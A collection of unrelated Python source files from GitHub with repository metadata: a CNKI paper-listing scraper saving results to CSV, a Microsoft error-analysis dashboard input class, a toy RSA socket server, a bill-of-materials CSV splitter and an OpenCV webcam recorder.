tr_list = doc('table.GridTableContent tbody tr').items()\r\n for tr in tr_list:\r\n # 文章标题\r\n title = tr.find('a.fz14').text().replace('\\n', '')\r\n if title =='':\r\n continue\r\n # 作者\r\n author = tr.find('td.author_flag').text()\r\n # 来源------选择target='_blank'和href属性中包含ridge子串所有节点。\r\n source = tr.find('a[target=_blank][href*=\"ridge\"]').text()\r\n # 发表时间-----选择align='center'的所有节点。\r\n data = tr.find('td[align=center]').text().split(' ')[0]\r\n # 被引量\r\n 
KnowledgeNetcont = tr.find('span.KnowledgeNetcont a').text()\r\n        if KnowledgeNetcont=='':\r\n            KnowledgeNetcont = '0'\r\n        # download count\r\n        downloadCount = tr.find('span.downloadCount a').text()\r\n        if downloadCount=='':\r\n            downloadCount = '0'\r\n\r\n        item = {\r\n            'title':title,\r\n            'author':author,\r\n            'source':source,\r\n            'data':data,\r\n            'KnowledgeNetcont':KnowledgeNetcont,\r\n            'downloadCount':downloadCount,\r\n        }\r\n        save(item)\r\n        print('Saved page %d successfully'%(page))\r\n\r\ndef save(item):\r\n    '''\r\n    Check whether this is the first write to the file: add the header row only on the first write, so the header is not written repeatedly.\r\n    :param item: the parsed content\r\n    :return: the saved CSV file\r\n    '''\r\n    if os.path.exists('%s.csv' %(user_input)):\r\n        with open('%s.csv' %(user_input), 'a', encoding='utf-8') as csvfile:\r\n            fieldname = ['title', 'author', 'source', 'data', 'KnowledgeNetcont', 'downloadCount']\r\n            writer = csv.DictWriter(csvfile, fieldname)\r\n            writer.writerow(item)\r\n    else:\r\n        with open('%s.csv' %(user_input),'a',encoding='utf-8') as csvfile:\r\n            fieldname = ['title', 'author', 'source', 'data', 'KnowledgeNetcont', 'downloadCount']\r\n            writer = csv.DictWriter(csvfile,fieldname) # DictWriter lets us write dicts to the csv file\r\n            writer.writeheader()\r\n            writer.writerow(item)\r\n\r\ndef main(MAX_PAGE):\r\n    for page in range(1,MAX_PAGE):\r\n        get_index_page(page)\r\n\r\nif __name__=='__main__':\r\n    main(MAX_PAGE)\r\n\r\n\r\n'''\r\nWhen paginating, this spider clicks the \"next page\" link, because the site has no input box for a page number,\r\nso content cannot be fetched by entering a page number directly. The search code has to sit outside the\r\nfunctions as global state; otherwise the site URL would be requested repeatedly while the code runs, and only\r\nthe first and second pages would ever be retrieved.\r\nHope this makes sense!!\r\n'''","repo_name":"L-fly123456/ZhiwangSpider","sub_path":"知网spider.py","file_name":"知网spider.py","file_ext":"py","file_size_in_byte":3982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18102092357","text":"import traceback\n\nimport numpy as np\nimport pandas as pd\n\nfrom erroranalysis._internal.constants import (Metrics, display_name_to_metric,\n                                              metric_to_display_name)\nfrom erroranalysis._internal.error_analyzer import (ModelAnalyzer,\n                                                    PredictionsAnalyzer)\nfrom erroranalysis._internal.utils import is_spark\nfrom raiutils.data_processing import convert_to_list, serialize_json_safe\nfrom raiutils.models import is_classifier\nfrom responsibleai._interfaces import ErrorAnalysisData\n\nfrom .constants import ModelTask\nfrom .error_analysis_constants import (ErrorAnalysisDashboardInterface,\n                                       MethodConstants)\nfrom .error_handling import _format_exception\nfrom .explanation_constants import (ExplanationDashboardInterface,\n                                    WidgetRequestResponseConstants)\n\nFEATURE_NAMES = ExplanationDashboardInterface.FEATURE_NAMES\nENABLE_PREDICT = ErrorAnalysisDashboardInterface.ENABLE_PREDICT\n\n\nclass ErrorAnalysisDashboardInput:\n    def __init__(\n            self,\n            explanation,\n            model,\n            dataset,\n            true_y,\n            classes,\n            features,\n            categorical_features,\n            true_y_dataset,\n            pred_y,\n            pred_y_dataset,\n            model_task,\n            metric,\n            max_depth,\n            num_leaves,\n            min_child_samples,\n            sample_dataset):\n        \"\"\"Initialize the ErrorAnalysis Dashboard Input.\n\n        :param explanation: An object that represents an explanation.\n        :type explanation: ExplanationMixin\n        :param model: An object that represents a model.\n            It is assumed that for the classification case\n            it has a method of predict_proba() returning\n            the prediction probabilities for each\n            class and for the regression case a method of predict()\n            returning the prediction value.\n        :type model: object\n        :param dataset: A matrix of feature vector examples\n            (# examples x # features), the same samples\n            used to build the 
explanation.\n Will overwrite any set on explanation object already.\n :type dataset: numpy.ndarray or list[][] or pandas.DataFrame\n :param true_y: The true labels for the provided explanation.\n Will overwrite any set on explanation object already.\n :type true_y: numpy.ndarray or list[] or pandas.Series\n :param classes: The class names.\n :type classes: numpy.ndarray or list[]\n :param features: Feature names.\n :type features: numpy.ndarray or list[]\n :param categorical_features: The categorical feature names.\n :type categorical_features: list[str]\n :param true_y_dataset: The true labels for the provided dataset.\n Only needed if the explanation has a sample of instances from the\n original dataset. Otherwise specify true_y parameter only.\n :type true_y_dataset: numpy.ndarray or list[] or pandas.Series\n :param pred_y: The predicted y values, can be passed in as an\n alternative to the model and explanation for a more limited\n view.\n :type pred_y: numpy.ndarray or list[] or pandas.Series\n :param pred_y_dataset: The predicted labels for the provided dataset.\n Only needed if providing a sample dataset for the UI while using\n the full dataset for the tree view and heatmap. Otherwise specify\n pred_y parameter only.\n :type pred_y_dataset: numpy.ndarray or list[] or pandas.Series\n :param model_task: Optional parameter to specify whether the model\n is a classification or regression model. In most cases, the\n type of the model can be inferred based on the shape of the\n output, where a classifier has a predict_proba method and\n outputs a 2 dimensional array, while a regressor has a\n predict method and outputs a 1 dimensional array.\n :type model_task: str\n :param metric: The metric name to evaluate at each tree node or\n heatmap grid. Currently supported classification metrics\n include 'error_rate', 'recall_score' for binary\n classification and 'micro_recall_score' or\n 'macro_recall_score' for multiclass classification,\n 'precision_score' for binary classification and\n 'micro_precision_score' or 'macro_precision_score'\n for multiclass classification, 'f1_score' for binary\n classification and 'micro_f1_score' or 'macro_f1_score'\n for multiclass classification, and 'accuracy_score'.\n Supported regression metrics include 'mean_absolute_error',\n 'mean_squared_error', 'r2_score', and 'median_absolute_error'.\n :type metric: str\n :param max_depth: The maximum depth of the surrogate tree trained\n on errors.\n :type max_depth: int\n :param num_leaves: The number of leaves of the surrogate tree\n trained on errors.\n :type num_leaves: int\n :param min_child_samples: The minimal number of data required\n to create one leaf.\n :type min_child_samples: int\n :param sample_dataset: Dataset with fewer samples than the main\n dataset. Used to improve performance only when an\n Explanation object is not provided. 
Used only if\n explanation is not specified for the dataset explorer.\n Specify less than 10k points for optimal performance.\n :type sample_dataset: pd.DataFrame or numpy.ndarray or list[][]\n \"\"\"\n self._model = model\n self._categorical_features = categorical_features\n self._string_ind_data = None\n self._categories = []\n self._categorical_indexes = []\n self._is_classifier = is_classifier(model)\n self._dataframeColumns = None\n self.dashboard_input = {}\n\n model_available = model is not None\n\n if model_available and pred_y is not None:\n raise ValueError(\n 'Only model or pred_y can be specified, not both')\n\n self.dashboard_input[ENABLE_PREDICT] = model_available\n\n self.dashboard_input[\n ExplanationDashboardInterface.IS_CLASSIFIER\n ] = self._is_classifier\n\n is_pyspark = is_spark(dataset)\n if is_pyspark:\n self.setup_pyspark(model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric,\n max_depth, num_leaves, min_child_samples,\n sample_dataset, model_available)\n else:\n self.setup_local(explanation, model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric,\n max_depth, num_leaves, min_child_samples,\n sample_dataset, model_available)\n data = self.get_error_analysis_data(max_depth,\n num_leaves,\n min_child_samples,\n self._error_analyzer.metric,\n is_pyspark)\n self.dashboard_input[\n ExplanationDashboardInterface.ERROR_ANALYSIS_DATA\n ] = data\n\n def setup_pyspark(self, model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric,\n max_depth, num_leaves, min_child_samples,\n sample_dataset, model_available):\n self._error_analyzer = ModelAnalyzer(model,\n dataset,\n true_y,\n features,\n categorical_features,\n model_task,\n metric,\n classes)\n sample = dataset.to_spark().limit(100)\n scored_sample = model.transform(sample)\n pd_sample = scored_sample.toPandas()\n predicted_y = pd_sample[\"prediction\"]\n predicted_y = self.predicted_y_to_list(predicted_y)\n true_y = pd_sample[true_y]\n pd_sample = pd_sample[features]\n list_dataset = convert_to_list(pd_sample)\n self.setup_visualization_input(classes, predicted_y,\n list_dataset, true_y, features)\n\n def setup_visualization_input(self, classes, predicted_y,\n list_dataset, true_y, features):\n if classes is not None:\n classes = convert_to_list(classes)\n self.dashboard_input[\n ExplanationDashboardInterface.CLASS_NAMES\n ] = classes\n class_to_index = {k: v for v, k in enumerate(classes)}\n\n if predicted_y is not None:\n # If classes specified, convert predicted_y to\n # numeric representation\n if classes is not None and predicted_y[0] in class_to_index:\n for i in range(len(predicted_y)):\n predicted_y[i] = class_to_index[predicted_y[i]]\n self.dashboard_input[\n ExplanationDashboardInterface.PREDICTED_Y\n ] = predicted_y\n\n row_length = 0\n feature_length = None\n\n if list_dataset is not None:\n row_length, feature_length = np.shape(list_dataset)\n if feature_length > 1000:\n raise ValueError(\"Exceeds maximum number of features for\"\n \" visualization (1000). 
Please regenerate the\"\n \" explanation using fewer features or\"\n \" initialize the dashboard without passing a\"\n \" dataset.\")\n self.dashboard_input[\n ExplanationDashboardInterface.TRAINING_DATA\n ] = serialize_json_safe(list_dataset)\n\n if true_y is not None and len(true_y) == row_length:\n list_true_y = convert_to_list(true_y)\n # If classes specified, convert true_y to numeric representation\n if classes is not None and list_true_y[0] in class_to_index:\n for i in range(len(list_true_y)):\n list_true_y[i] = class_to_index[list_true_y[i]]\n self.dashboard_input[\n ExplanationDashboardInterface.TRUE_Y\n ] = list_true_y\n\n if features is not None:\n features = convert_to_list(features)\n if feature_length is not None and len(features) != feature_length:\n raise ValueError(\"Feature vector length mismatch:\"\n \" feature names length differs\"\n \" from local explanations dimension\")\n self.dashboard_input[FEATURE_NAMES] = features\n\n def setup_local(self, explanation, model, dataset, true_y, classes,\n features, categorical_features, true_y_dataset,\n pred_y, pred_y_dataset, model_task, metric, max_depth,\n num_leaves, min_child_samples, sample_dataset,\n model_available):\n full_dataset = dataset\n if true_y_dataset is None:\n full_true_y = true_y\n else:\n full_true_y = true_y_dataset\n if pred_y_dataset is None:\n full_pred_y = pred_y\n else:\n full_pred_y = pred_y_dataset\n has_explanation = explanation is not None\n probability_y = None\n\n if has_explanation:\n if classes is None:\n has_classes_attr = hasattr(explanation, 'classes')\n if has_classes_attr and explanation.classes is not None:\n classes = explanation.classes\n dataset, true_y = self.input_explanation(explanation,\n dataset,\n true_y)\n row_length = len(dataset)\n # Only check dataset on explanation for row length bounds\n if row_length > 100000:\n raise ValueError(\n \"Exceeds maximum number of rows\"\n \"for visualization (100000)\")\n elif sample_dataset is not None:\n dataset = sample_dataset\n\n if isinstance(dataset, pd.DataFrame) and hasattr(dataset, 'columns'):\n self._dataframeColumns = dataset.columns\n self._dfdtypes = dataset.dtypes\n try:\n list_dataset = convert_to_list(dataset)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Unsupported dataset type, inner error: {}\".format(ex_str))\n\n if has_explanation:\n self.input_explanation_data(list_dataset, classes)\n if features is None and hasattr(explanation, 'features'):\n features = explanation.features\n\n if model_available:\n predicted_y = self.compute_predicted_y(model, dataset)\n else:\n predicted_y = self.predicted_y_to_list(pred_y)\n\n self.setup_visualization_input(classes, predicted_y,\n list_dataset, true_y, features)\n\n if model_available and is_classifier(model) and \\\n dataset is not None:\n try:\n probability_y = model.predict_proba(dataset)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\"Model does not support predict_proba method\"\n \" for given dataset type,\"\n \" inner error: {}\".format(ex_str))\n try:\n probability_y = convert_to_list(probability_y)\n except Exception as ex:\n ex_str = _format_exception(ex)\n raise ValueError(\n \"Model predict_proba output of unsupported type,\"\n \"inner error: {}\".format(ex_str))\n self.dashboard_input[\n ExplanationDashboardInterface.PROBABILITY_Y\n ] = probability_y\n if model_available:\n self._error_analyzer = ModelAnalyzer(model,\n full_dataset,\n full_true_y,\n features,\n categorical_features,\n model_task,\n 
metric,\n                                                 classes)\n        else:\n            # Model task cannot be unknown when passing predictions\n            # Assume classification for backwards compatibility\n            if model_task == ModelTask.UNKNOWN:\n                model_task = ModelTask.CLASSIFICATION\n            self._error_analyzer = PredictionsAnalyzer(full_pred_y,\n                                                       full_dataset,\n                                                       full_true_y,\n                                                       features,\n                                                       categorical_features,\n                                                       model_task,\n                                                       metric,\n                                                       classes)\n        if self._categorical_features:\n            self.dashboard_input[\n                ExplanationDashboardInterface.CATEGORICAL_MAP\n            ] = serialize_json_safe(self._error_analyzer.category_dictionary)\n        # Compute metrics on all data cohort\n        if self._error_analyzer.model_task == ModelTask.CLASSIFICATION:\n            if self._error_analyzer.metric is None:\n                metric = Metrics.ERROR_RATE\n            else:\n                metric = self._error_analyzer.metric\n        else:\n            if self._error_analyzer.metric is None:\n                metric = Metrics.MEAN_SQUARED_ERROR\n            else:\n                metric = self._error_analyzer.metric\n        if model_available:\n            full_pred_y = self.compute_predicted_y(model, full_dataset)\n        # If we don't have an explanation or model/probabilities specified\n        # we can try to use model task to figure out the method\n        if not has_explanation and probability_y is None:\n            method = MethodConstants.REGRESSION\n            if self._error_analyzer.model_task == ModelTask.CLASSIFICATION:\n                if (len(np.unique(predicted_y)) > 2):\n                    method = MethodConstants.MULTICLASS\n                else:\n                    method = MethodConstants.BINARY\n            self.dashboard_input[\n                ErrorAnalysisDashboardInterface.METHOD\n            ] = method\n\n    def get_error_analysis_data(self, max_depth, num_leaves,\n                                min_child_samples, metric,\n                                is_pyspark):\n        data = ErrorAnalysisData()\n        data.maxDepth = max_depth\n        data.numLeaves = num_leaves\n        data.minChildSamples = min_child_samples\n        data.metric = metric_to_display_name[metric]\n        if not is_pyspark:\n            data.root_stats = self._error_analyzer.compute_root_stats()\n        else:\n            features = self.dashboard_input[FEATURE_NAMES]\n            filters = []\n            composite_filters = []\n            self._error_analyzer.update_metric(metric)\n            tree = self._error_analyzer.compute_error_tree(\n                features, filters, composite_filters,\n                max_depth=max_depth,\n                num_leaves=num_leaves,\n                min_child_samples=min_child_samples)\n            data.tree = tree\n            data.tree_features = features\n        return data\n\n    def compute_predicted_y(self, model, dataset):\n        predicted_y = None\n        if dataset is not None and model is not None:\n            try:\n                predicted_y = model.predict(dataset)\n            except Exception as ex:\n                ex_str = _format_exception(ex)\n                msg = (\"Model does not support predict method for given\"\n                       \" dataset type, inner error: {}\").format(ex_str)\n                raise ValueError(msg)\n            predicted_y = self.predicted_y_to_list(predicted_y)\n        return predicted_y\n\n    def predicted_y_to_list(self, predicted_y):\n        try:\n            predicted_y = convert_to_list(predicted_y)\n        except Exception as ex:\n            ex_str = _format_exception(ex)\n            raise ValueError(\n                \"Model prediction output of unsupported type,\"\n                \" inner error: {}\".format(ex_str))\n        return predicted_y\n\n    def input_explanation(self, explanation, dataset, true_y):\n        self._mli_explanations = explanation.data(-1)[\"mli\"]\n        dataset_explanation = self._find_first_explanation(\n            ExplanationDashboardInterface.MLI_EXPLANATION_DATASET_KEY)\n        if hasattr(explanation, 'method'):\n            self.dashboard_input[\n                ExplanationDashboardInterface.EXPLANATION_METHOD\n            ] = explanation.method\n        if dataset_explanation is not None:\n            if dataset is None or len(dataset) != len(true_y):\n                dataset = dataset_explanation[\n                    ExplanationDashboardInterface.MLI_DATASET_X_KEY\n                ]\n            if true_y is None:\n                true_y = dataset_explanation[\n                    
ExplanationDashboardInterface.MLI_DATASET_Y_KEY\n                ]\n        elif len(dataset) != len(true_y):\n            dataset = explanation._eval_data\n        return dataset, true_y\n\n    def input_explanation_data(self, list_dataset, classes):\n        # List of explanations, key of explanation type is \"explanation_type\"\n        local_explanation = self._find_first_explanation(\n            ExplanationDashboardInterface.MLI_LOCAL_EXPLANATION_KEY)\n        global_explanation = self._find_first_explanation(\n            ExplanationDashboardInterface.MLI_GLOBAL_EXPLANATION_KEY)\n        ebm_explanation = self._find_first_explanation(\n            ExplanationDashboardInterface.MLI_EBM_GLOBAL_EXPLANATION_KEY)\n\n        if local_explanation is not None:\n            try:\n                local_explanation[\"scores\"] = convert_to_list(\n                    local_explanation[\"scores\"])\n                if np.shape(local_explanation[\"scores\"])[-1] > 1000:\n                    raise ValueError(\"Exceeds maximum number of features for \"\n                                     \"visualization (1000). Please regenerate\"\n                                     \" the explanation using fewer features.\")\n                local_explanation[\"intercept\"] = convert_to_list(\n                    local_explanation[\"intercept\"])\n                # We can ignore perf explanation data.\n                # Note if it is added back at any point,\n                # the numpy values will need to be converted to python,\n                # otherwise serialization fails.\n                local_explanation[\"perf\"] = None\n                self.dashboard_input[\n                    ExplanationDashboardInterface.LOCAL_EXPLANATIONS\n                ] = local_explanation\n            except Exception as ex:\n                ex_str = _format_exception(ex)\n                raise ValueError(\n                    \"Unsupported local explanation type,\"\n                    \" inner error: {}\".format(ex_str))\n            if list_dataset is not None:\n                row_length, feature_length = np.shape(list_dataset)\n                local_dim = np.shape(local_explanation[\"scores\"])\n                if len(local_dim) != 2 and len(local_dim) != 3:\n                    raise ValueError(\n                        \"Local explanation expected to be a 2D or 3D list\")\n                if len(local_dim) == 2 and (local_dim[1] != feature_length or\n                                            local_dim[0] != row_length):\n                    raise ValueError(\n                        \"Shape mismatch: local explanation\"\n                        \" length differs from dataset\")\n                if len(local_dim) == 3 and (local_dim[2] != feature_length or\n                                            local_dim[1] != row_length):\n                    raise ValueError(\n                        \"Shape mismatch: local explanation\"\n                        \" length differs from dataset\")\n                if classes is not None and len(classes) != local_dim[0]:\n                    raise ValueError(\"Class vector length mismatch:\"\n                                     \" class names length differs from\"\n                                     \" local explanations dimension\")\n        if local_explanation is None and global_explanation is not None:\n            try:\n                global_explanation[\"scores\"] = convert_to_list(\n                    global_explanation[\"scores\"])\n                if 'intercept' in global_explanation:\n                    global_explanation[\"intercept\"] = convert_to_list(\n                        global_explanation[\"intercept\"])\n                self.dashboard_input[\n                    ExplanationDashboardInterface.GLOBAL_EXPLANATION\n                ] = global_explanation\n            except Exception as ex:\n                ex_str = _format_exception(ex)\n                raise ValueError(\"Unsupported global explanation type,\"\n                                 \" inner error: {}\".format(ex_str))\n        if ebm_explanation is not None:\n            try:\n                self.dashboard_input[\n                    ExplanationDashboardInterface.EBM_EXPLANATION\n                ] = ebm_explanation\n            except Exception as ex:\n                ex_str = _format_exception(ex)\n                raise ValueError(\n                    \"Unsupported ebm explanation type: {}\".format(ex_str))\n\n    def debug_ml(self, data):\n        try:\n            features = data[0]\n            filters = data[1]\n            composite_filters = data[2]\n            max_depth = data[3]\n            num_leaves = data[4]\n            min_child_samples = data[5]\n            metric = display_name_to_metric[data[6]]\n            self._error_analyzer.update_metric(metric)\n            tree = self._error_analyzer.compute_error_tree(\n                features, filters, composite_filters,\n                
max_depth=max_depth,\n num_leaves=num_leaves,\n min_child_samples=min_child_samples)\n return {\n WidgetRequestResponseConstants.DATA: tree\n }\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Failed to generate json tree representation\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def matrix(self, features, filters, composite_filters,\n quantile_binning, num_bins, metric):\n try:\n if features[0] is None and features[1] is None:\n return {WidgetRequestResponseConstants.DATA: []}\n metric = display_name_to_metric[metric]\n self._error_analyzer.update_metric(metric)\n matrix = self._error_analyzer.compute_matrix(\n features, filters, composite_filters,\n quantile_binning, num_bins)\n return {\n WidgetRequestResponseConstants.DATA: matrix\n }\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Failed to generate json matrix representation\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def importances(self):\n try:\n scores = self._error_analyzer.compute_importances()\n return {\n WidgetRequestResponseConstants.DATA: scores\n }\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Failed to generate feature importances\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def on_predict(self, data):\n try:\n if self._dataframeColumns is not None:\n data = pd.DataFrame(data, columns=self._dataframeColumns)\n data = data.astype(dict(self._dfdtypes))\n if (self._is_classifier):\n model_pred_proba = self._model.predict_proba(data)\n prediction = convert_to_list(model_pred_proba)\n else:\n model_predict = self._model.predict(data)\n prediction = convert_to_list(model_predict)\n return {\n WidgetRequestResponseConstants.DATA: prediction\n }\n except Exception:\n return {\n WidgetRequestResponseConstants.ERROR:\n \"Model threw exception while predicting...\",\n WidgetRequestResponseConstants.DATA: []\n }\n\n def _find_first_explanation(self, key):\n interface = ExplanationDashboardInterface\n explanation_type_key = interface.MLI_EXPLANATION_TYPE_KEY\n new_array = [explanation for explanation\n in self._mli_explanations\n if explanation[explanation_type_key] == key]\n if len(new_array) > 0:\n return new_array[0][\"value\"]\n return None\n","repo_name":"microsoft/responsible-ai-toolbox","sub_path":"raiwidgets/raiwidgets/error_analysis_dashboard_input.py","file_name":"error_analysis_dashboard_input.py","file_ext":"py","file_size_in_byte":28086,"program_lang":"python","lang":"en","doc_type":"code","stars":1031,"dataset":"github-code","pt":"37"} +{"seq_id":"1875791687","text":"import socket\nfrom rsa import get_decrypted_message\nfrom sudoku import solved_sudoku, decrypt_sudoku\nfrom config import *\nimport json\n\ndef start_server():\n\n mySocket = socket.socket()\n mySocket.bind((HOST, PORT))\n\n mySocket.listen(1)\n conn, addr = mySocket.accept()\n print('Connection from: ' + str(addr))\n while True:\n data = conn.recv(20480).decode()\n if not data:\n break\n\n data = json.loads(data) \n print('Server: Data sent by client =>' + str(data))\n print('Server: Decrypting message..')\n \n decrypted_message = []\n for element in data:\n decrypted_element = get_decrypted_message(message=str(element))\n print(decrypted_element[1:])\n decrypted_message.append(decrypted_element[1:])\n \n\n decrypted_message = decrypt_sudoku(solved_sudoku, decrypted_message)\n \n print(f'Server: Message => {decrypted_message}')\n\n 
acknowledgement = 'Message successfully received by Server.'\n        print(f'Sending: {acknowledgement}')\n        conn.send(acknowledgement.encode())\n\n    conn.close()\n\n\nif __name__ == '__main__':\n    start_server()\n","repo_name":"adityaa30/sudoku-rsa-encrypt","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15561075229","text":"import csv\n\n# init var setup\n_itemName = []\n_level = []\n_rawMaterial = []\n_quantity = []\n_unit = []\n\n# read data from CSV File and store them in their respective list\nwith open('bom.csv', mode='r') as csv_file:\n    csv_reader = csv.DictReader(csv_file)\n    line_count = 0\n    for row in csv_reader:\n        if line_count >= 0:\n            _itemName.append(row[\"Item Name\"])\n            _level.append(int(row['Level'].replace('.', '')))  # replace dot and type cast level value to integer\n            _rawMaterial.append(row['Raw material'])\n            _quantity.append(row['Quantity'])\n            _unit.append(row['Unit '])\n        line_count += 1\n\n# get top level item \n_uniqueItems = set(_itemName)\n\n# get all unique level\n_uniqueLevels = []\nfor lvl in _level:\n    if lvl not in _uniqueLevels:\n        _uniqueLevels.append(lvl)\n\n# sort to make it easy for later maths\n_uniqueLevels.sort()\n\n# loop through the top level items and \n# make their respective BOM files\ncounter = 0\nfor item in _uniqueItems:\n    filename = item\n    with open(f'{filename}.csv', mode='w') as f:\n        info_writer = csv.writer(f, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        info_writer.writerow(['Finished Good List'])\n        fieldnames = ['#', 'Item Description', 'Quantity', 'Unit']\n        writer = csv.DictWriter(f, fieldnames=fieldnames)\n        writer.writeheader()\n        writer.writerow({'#': 1, 'Item Description': filename, 'Quantity': 1, 'Unit': 'Pc'})\n\n        info_writer.writerow(['End Of FG'])\n        info_writer.writerow(['Raw Material List'])\n        writer.writeheader()\n\n        row = 0\n        serial = 1\n        for uniLevel in _uniqueLevels:\n            for level in _level:\n                if uniLevel > 1:\n                    if _itemName[row] == item and _level[row] == uniLevel:\n                        _list = []\n                        for i in reversed(range(row)):\n                            _list.append(i + 1)\n                            if _level[i] == uniLevel - 1:\n                                rm_filename = _rawMaterial[i]\n                                with open(f'{rm_filename}.csv', mode='w') as rmf:\n                                    rm_info_writer = csv.writer(rmf, delimiter=',', quotechar='\"',\n                                                                quoting=csv.QUOTE_MINIMAL)\n                                    rm_info_writer.writerow(['Finished Good List'])\n                                    rm_fieldnames = ['#', 'Item Description', 'Quantity', 'Unit']\n                                    rm_writer = csv.DictWriter(rmf, fieldnames=rm_fieldnames)\n                                    rm_writer.writeheader()\n                                    rm_writer.writerow(\n                                        {'#': 1, 'Item Description': rm_filename, 'Quantity': _quantity[i],\n                                         'Unit': _unit[i]})\n\n                                    rm_info_writer.writerow(['End Of FG'])\n                                    rm_info_writer.writerow(['Raw Material List'])\n                                    rm_writer.writeheader()\n\n                                    rm_serial = 1\n                                    for product_serial in _list:\n                                        rm_writer.writerow({'#': rm_serial,\n                                                            'Item Description': _rawMaterial[product_serial],\n                                                            'Quantity': _quantity[product_serial],\n                                                            'Unit': _unit[product_serial]\n                                                            })\n                                        rm_serial += 1\n                                break\n                else:\n                    if _itemName[row] == item and _level[row] == 1:\n                        writer.writerow({'#': serial, 'Item Description': _rawMaterial[row], 'Quantity': _quantity[row],\n                                         'Unit': _unit[row]})\n                        serial += 1\n                row += 1\n            row = 0\n        info_writer.writerow(['End Of RM'])\n    counter += 
1\n","repo_name":"rishukr06/bill-of-materials","sub_path":"bom.py","file_name":"bom.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"42286289782","text":"import cv2\nimport os\nfrom datetime import datetime\nimport psutil\n\nclass Recorder:\n def __init__(self, width: int, height: int, path: str, fps: float, format: str, device: int):\n self.width = width\n self.height = height\n self.path = path\n self.fps = fps\n self.format = format\n self.device = device\n\n def check_dir(self):\n print(\"Check directory:\")\n if os.path.isdir(self.path):\n print(\"\\tThis directory exist\\n\")\n else:\n os.mkdir(self.path)\n print(\"\\tDirectory successfully created\\n\")\n\n def source_format(self):\n if self.format == \"MJPG\":\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n return fourcc\n else:\n print(f\"Error: Format '{self.format}' is not supported\")\n\n def check_space(self):\n disk = psutil.disk_usage('/')\n free_space = disk.free/(1024**3)\n print(\"\\nCheck free space on disk:\")\n if free_space > 50:\n print(f\"\\tFree space on disk: {free_space:.2f} GB\")\n return True\n else:\n print(\"⚠ ERROR: Not enough space ⚠\")\n print(f\"\\tOnly free space on disk: {free_space:.2f} GB\")\n print(f\"\\t⚠ Please make some space on your disk. You should get more than 50 Go of free space ⚠\")\n return False\n\n\n def periph_choice(self):\n # checks the first 10 indexes.\n index = 0\n arr = []\n i = 10\n while i > 0:\n cap = cv2.VideoCapture(index)\n if cap.read()[0]:\n arr.append(index)\n cap.release()\n index += 1\n i -= 1\n return arr# TODO write method to find the go video peripheric to record video\n\n def record(self):\n cap = cv2.VideoCapture(self.device)\n cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)\n cap.set(cv2.CAP_PROP_FPS, self.fps)\n\n format = cap.get(cv2.CAP_PROP_FORMAT)\n width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\n height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n fps = cap.get(cv2.CAP_PROP_FPS)\n\n # Date text setup\n font = cv2.FONT_HERSHEY_SIMPLEX\n scale = 1\n color = (0, 168, 0)\n\n print(\"Video property:\")\n print(f\"\\tWidth: {width}\")\n print(f\"\\tHeight: {height}\")\n print(f\"\\tFPS: {fps}\")\n print(f\"\\tFormat: {format}\")\n\n current_time = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n video_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n fourcc = Recorder.source_format(self)#cv2.VideoWriter_fourcc(*'mp4v')#\n out = cv2.VideoWriter(f\"{self.path}/video_{current_time}.avi\", fourcc, fps, (int(width), int(height)))\n\n while (cap.isOpened()):\n # Capture frame-by-frame\n ret, frame = cap.read()\n if ret == True:\n # Set date and hours\n current_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n cv2.putText(frame, current_time, (0, 25), font, scale, color, 2)\n\n # Write the frame into the output video file\n out.write(frame)\n\n # Display the resulting frame\n cv2.imshow(f\"Cam Recording start: {video_time}\", frame)\n\n # Press 'q' to exit the loop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n else:\n break\n\n # Release everything when the job is finished\n cap.release()\n out.release()\n cv2.destroyAllWindows()","repo_name":"romain420/camera_recorder","sub_path":"record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
